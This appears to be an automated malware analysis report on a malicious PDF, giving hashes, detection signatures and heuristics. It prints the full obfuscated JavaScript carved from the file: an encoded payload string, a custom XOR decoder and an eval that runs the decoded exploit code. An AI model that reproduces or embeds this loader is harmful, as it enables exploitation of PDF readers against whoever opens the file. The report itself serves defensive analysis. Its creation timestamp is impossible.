Malicious PDF — malware analysis report

Static analysis result for SHA-256 aa825d6f6b80fe5d…

MALICIOUS

PDF

6.9 KB Created: 2008-31-20 53:85:00 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2012-07-12
MD5: f03b5bc2189f925cbcb5f596b89695d7 SHA-1: fdbcdb7ecae4cb0ff223dbf6c24425d11a0c5a34 SHA-256: aa825d6f6b80fe5d42651a4c9af2180219bd4dd33642353cd039f7e9ede6032f
286 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.007 JavaScript

The PDF file was flagged as malicious by ClamAV with the signature Pdf.Exploit.Agent-35587. Static analysis revealed embedded JavaScript with multiple obfuscated eval() calls, indicating an attempt to hide malicious code execution. The ML classifier also strongly indicated maliciousness. The primary attack pattern involves exploiting vulnerabilities within the PDF reader via JavaScript.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • ClamAV: Pdf.Exploit.Agent-35587 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35587
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var datf = 'qT'+'n'+'fZ1KM7Zoqhl'+'zu'+'f6n'+'fl8P0ah'+'28P0Eg8Lg8P0Eg'+'8Lg8P0'+'E'+'g'+'8Lg8P'+'8dC'+'z'+'GK8P6EgPhK8PCd2R'+'Zg8PVlgWZg8PVlg2'+'gg8PT5CyLg8PT5g8L'+'g8PT5q52K'+'8P'+'Tuy2lg8P'+'C5'+'Cz6K8P'+'C5C5CK8PVdq'+'@qK8P'+'05C8lK8PT5CzCK'+'8P'+'Cl'+'2z'+'CK8PTo'+'gdC'+'K8PZdCKfg'+'8P0dg56'+'g8P'+'ZdCKf'+'g8'+'P'+'CgCza'+'g8PT5C2Lg8PT5CzGK'+'8PCl2z'+'CK8PGKy2Lg8PCgg6O'+'g8PT'+'Kgd2g8'+'P8E22Lg'+'8'+'PT'+'5'+'Cggg8PT5CzCK8P2Kq'+'Kqg8PG'+'KyzG'+'K8PaE26Og8PCg2g'+'gg'+'8P8E2'+'z2g8P'+'T5CgqK8 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x3D5 5387 bytes
SHA-256: cee0c0a6a9408ac56e453f1d6b3cfeb120507921f4b0a05ddea8e9a718d68bdf
Detection
ClamAV: Pdf.Exploit.Agent-35587
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s). 125 of 191 identifiers look randomly generated (e.g. 'lg8PCl2WCg8PCo2W2K8PC5C2Og8PT5CzCK8PVg2'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var datf = 'qT'+'n'+'fZ1KM7Zoqhl'+'zu'+'f6n'+'fl8P0ah'+'28P0Eg8Lg8P0Eg'+'8Lg8P0'+'E'+'g'+'8Lg8P'+'8dC'+'z'+'GK8P6EgPhK8PCd2R'+'Zg8PVlgWZg8PVlg2'+'gg8PT5CyLg8PT5g8L'+'g8PT5q52K'+'8P'+'Tuy2lg8P'+'C5'+'Cz6K8P'+'C5C5CK8PVdq'+'@qK8P'+'05C8lK8PT5CzCK'+'8P'+'Cl'+'2z'+'CK8PTo'+'gdC'+'K8PZdCKfg'+'8P0dg56'+'g8P'+'ZdCKf'+'g8'+'P'+'CgCza'+'g8PT5C2Lg8PT5CzGK'+'8PCl2z'+'CK8PGKy2Lg8PCgg6O'+'g8PT'+'Kgd2g8'+'P8E22Lg'+'8'+'PT'+'5'+'Cggg8PT5CzCK8P2Kq'+'Kqg8PG'+'KyzG'+'K8PaE26Og8PCg2g'+'gg'+'8P8E2'+'z2g8P'+'T5CgqK8PT5CzCK8P2KqKqg8'+'P'+'G'+'Ky'+'zag8P6Kq6Og8P2'+'lgPq'+'K8P'+'8E2v'+'fK8PT5C2fK8PT5C'+'z'+'CK8P2'+'Kq'+'Kq'+'g8PGKyz6g8P8lg6Og8P8dCvgg8P8E26qK8'+'P'+'T5C'+'yhK8PT5CzCK8P2KqKqg8PGK'+'y5C'+'K8PGgC6O'+'g'+'8P8'+'gqLqg8P8E2POg8PT5CvE'+'g8PT5CzC'+'K8P2K'+'qKqg8P25'+'C5GK8P0'+'o2KqK8PZgqvLK'+'8'+'PCd'+'2glg8'+'PCo2d2K8PTuy2qg8PT'+'5CzT'+'K8PGKg'+'zCK8PZgqKqg'+'8'+'PC'+'l'+'2R'+'GK8PT'+'5q'+'d2K8PTK'+'C6lg'+'8PCl2WCg8PCo2W2K8'+'P'+'8E2WZg8'+'PT5CK'+'fg8PT'+'5CzCK8PVE2WCK8'+'P'+'CK21Zg8P'+'ZdCR8'+'g8Paly'+'2Og8PT5C'+'zCK8PC'+'d2zCK8PCo'+'g'+'d2'+'K8P'+'GgqKfg8PGdCKLK8PCd'+'2WCK8P'+'65'+'Cd'+'2'+'K8P2lg6Og8PT5CzC'+'K8'+'PG5CzCK8P2'+'Kq'+'Kfg8PVg2'+'5GK8P'+'G52z0K8PG'+'KqKfg8P8E2'+'5a'+'g8PT5C6'+'lK8PT5'+'CzC'+'K8P2Kqz6K8PGlyRCK8PGogzCK8P'+'6Kg'+'Lgg8PGly6'+'g'+'K'+'8PT5qdCK8PVgqLOg8PT5CzC'+'K8'+'PZgqgPg8PC'+'l2RCK8PTogd2K8P'+'T'+'KC6lg8PCl2WC'+'g8PCo2W2K8P25'+'C2Og8PT5CzCK8PVg2'+'z'+'CK8PGo'+'2zVg8P2Kqz6K8P0oqRGK8PGoqyfg8P2l'+'gW6K8P65CLgK8PGoqWCK8P2'+'KqKfg8P'+'Vg256g8P'+'G52z'+'2K8PGK'+'qK'+'fg8P8E25ag8PT5CR6K'+'8PT5CzCK8PT5C6lg8P'+'Zg'+'qgPg'+'8PCl2RCK8P'+'To2'+'d2K8PTuC6'+'lg8PCl2WCg8PCo2W2K8PC5C2Og8PT5CzCK8PVg2'+'zCK'+'8P'+'Cl'+'2gPg8P'+'C5Cd2'+'K8PT'+'KC6lg8'+'PCl2W'+'Cg8PC'+'o2W2K8'+'PT5C'+'2Og8P'+'T5Cz'+'CK8P2'+'KCzCK'+'8PGu'+'CW0g8P'+'8'+'gCz'+'6K8P8'+'gCz6K8'+'P8'+'gCz6K'+'8'+'P8gCz6K'+'8P8Eg'+'KLK8PGK2zGK8PCl2W6K'+'8P8lCylg8PGuCgng8P8dCgPg8PCl2W2'+'K8PCl2'+'2Lg8PTo2'+'Lhg8PG5gKfg8P'+'GKyz6g'+'8PZEqKf'+'g'+'8P'+'Cl216g8PCKgL'+'hK8P'+'To'+'qLOg'+'8PGKygLK8PZgyKfg8PTo'+'qRC'+'K'+'8P0oqgLK'+'8P252vqg8P0dgdTK'+'8PGEqz6K8'+'P0oqWZg8P'+'TuggEg8P'+'C5CPgg8'+'P'+'2'+'lC1Tg8PTo2L'+'hK8P'+'Gggvl'+'K8PToqzGg8P2'+'5'+'CgfK'+'8P2gC'+'2fg8P2gg10'+'g'+'8PZg'+'q'+'W2g8PGK22gK8P8l2Kfg8PGK'+'2K'+'fg8PTo'+'qRGK8PV'+'gyy'+'hg8'+'PTogK'+'fg'+'8PCl2d0g'+'8PCogW'+'T'+'g8P6'+'dgz6K8PT5qKfg'+'8PTo'+'qK'+'fg8PG'+'Kgvg'+'K8PGl'+'C'+'WGg8PT5Czag8P2dq2Og8P2lgggg8PG'+'Kq'+'gPg8P2ogW0K8P2ugdGg8PT'+'5Cd2g8Pal2K'+'ng8Palg'+'@fg8PGdCygK8PCEgvqK8PCgyKLK8PCgCKl'+'g8PC'+'g2@fg8P'+'GgC@Lg8P'+'Cg2'+'@Og8'+'PCEgKhg8PClCKq'+'K8PCEgvlK8'+'PC'+'lCKq'+'K8PCl'+'CvlK8PGdC@'+'n'+'g8PCdCKng8'+'Pal2@L'+'g8'+'PC'+'ggvqK8P'+'C'+'lCKfg8PC'+'gCKEg8PCE2vqK8PCd'+'CKlg8PCg2@'+'Lg8Pad2@hg8PCEgK'+'Eg'+'8PaEg'+'K'+'lg'+'8'+'PCEq'+'vqK8PC'+'g'+'gKq'+'K8PC'+'gyKfg8PCE2K'+'lK8'+'PalgvlK8PalgKng8PC'+'gyyqK8P6lCKfg8P6lgygg8'+'PaEgvqg8PCEq@Pg8P6'+'d'+'2yfK8P8l'+'gyEdPOUd'+'TlG'+'fPv2z'+'f09KvPS80y'+'68f2T0'+'@Bl2T2gug'+'dT'+'2T2gugdG2@mqPfv824vr@qQZoFDV0OhhlgmqPfv8TCn11lz8fMg63gMX'+'g4vr@'+'qQZoFD'+'V0O4d'+'8Ts8MA'+'Oc@FRSTufSV08'+'VVy@'+'V8MCT'+'0@v2zf'+'095KCT1uM'+'0fMGfK'+'aCGPC2V8lw6E0OhPlB0VF4ddlgG'+'0'+'0x9dT'+'l'+'GfPFT0gLU1F2qgvv2zf095Ky'+'Tzfy'+'0zlOSV0aPlK1TM'+'uvTu'+'la2nOyO8@mqPfv8Za@PdgS6Q4PGulySKvv2zf'+'095'+'KyTzfy0z'+'lO'+'S'+'V0aPlKv2'+'zf095K'+'CT1uM0fMqfKaC'+'GPC2V8lw'+'6'+'E0OU'+'ET'+'aZ0ufVZa@Pd'+'gS6Q'+'4PGul'+'yS5KCT1uM0fM'+'4f'+'K'+'a'+'CGPC'+'2V8l'+'w6'+'E0GPl'+'sKPlg'+'2Pg@3algv'+'zoO'+'7'+'Tzq26z'+'AhO322hl'+'A'+'wc@TW8nlb9Za@Pdg'+'S6'+'Q'+'4PGuly'+'So@FT'+'0gLU1'+'F2qEyK21lT'+'fKuSZ@FW0lFu0E'+'gvn5fh_8'+'0@'+'82'+'qvGPfLV'+'2@mqVuvVZOo'+'65lV90uF91fKCdghPEywC3qv0'+'3'+'MCeVM'+'BCz2vzggvPlgmLQaRG'+'fa41V'+'u4G1TKhE@4EZs1X'+'0AUZ5q8n'+'508Ldge'+'GV4w'+'C3qv03MCeVMBCz2vd@v'+'3al'+'gv'+'zoO7Tz'+'q'+'2'+'6z'+'A4d8Ts8'+'MAOc'+'@FRXzT'+'lGf'+'P0CKCIZ@vg'+'hgyLEgyLE'+'gyLEg'+'yLEgyLEgyLE'+'ly'+'6nly6nly6nly6nly6nly6nly6nly6nl'+'y6nly6nly6'+'nly6n'+'ly6nl'+'y6nly6nly6nly6nly6nly6nly6nly6nly6'+'nly6nly6nly6nly'+'6nl'+'y6nly6nl'+'y6n'+'ly6nly'+'6nly6nly6nl'+'y6nly6nly6nly6nly6nly6n'+'ly6nly6nly'+'6'+'n'+'ly'+'6n'+'ly6'+'nly6n'+'ly'+'6nly6nly6nly6n'+'ly6nly6nl'+'y6nl'+'y6nly6nl'+'y'+'6nl'+'y6nly6nly'+'6nly6nly6nly6'+'nl'+'y6nly6nly6'+'nly6nly6nly6nly'+'6nly6nly6nly6nly'+'6nly6nly'+'6nly6'+'nly6nly6nly6n'+'l'+'y6nly6n'+'ly6'+'nly6nly6nly'+'6n'+'ly6nly6nly6nly6nly6n'+'ly6n'+'ly6nly6nEyP0PMCSTlv'+'Z'+'1u8C0@BlT2PPlg2q1PCf1CzcK4OUE'; function x5mzpznBG(xgFyQhq){ var tp = '63@31@43@12@48@29@35@1@47@3@0@0@0@0@0@0@44@53@57@55@20@10@52@39@18@17@9@45@34@60@37@50@46@28@24@23@59@2@15@25@27@49@11@0@0@0@0@22@0@51@21@7@26@19@62@42@38@0@4@36@58@32@14@13@33@54@6@56@5@61@41@8@16@40@30'; var nInuGccDPx=0, eiPeTEP60U7W6=xgFyQhq.length, qsaPrNb8Kn=1024, pmFIcCBKcq, eFt1kzWpa8iAW, Q8itvWUhmm='', wxeaoSR4LRoLye=nInuGccDPx, iM7cx=nInuGccDPx, SfYfB3Nyphwn=nInuGccDPx, Gbozf0QTUP=Array(); Gbozf0QTUP = eval("tp"+".s"+"pl"+"it"+"('@')"); for(eval('eFt1kzWpa8iAW=Ma'+'th.'+'ce'+'il(eiPeTEP60U7W6'+'/qsaPrNb8Kn)');eFt1kzWpa8iAW>nInuGccDPx;eFt1kzWpa8iAW--){ for(eval('pmFIcCBKcq=M'+'ath'+'.m'+'in(eiPeTEP60U7W6,'+'qsaPrNb8Kn)');pmFIcCBKcq>nInuGccDPx;pmFIcCBKcq--,eiPeTEP60U7W6--){ eval('SfYfB3Nyphwn|'+'=(Gbozf0QTUP['+'xgFyQhq.'+'cha'+'rCo'+'de'+'At(wxeaoSR4LRoLye+'+'+)-48])<'+'<iM7cx'); if(iM7cx){ eval('Q8itvWUhmm+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](155^'+'SfYfB3Nyphwn&'+'25'+'5)'); SfYfB3Nyphwn>>=8; iM7cx-=2; } else { iM7cx=6; } } } eval(Q8itvWUhmm); } x5mzpznBG(datf);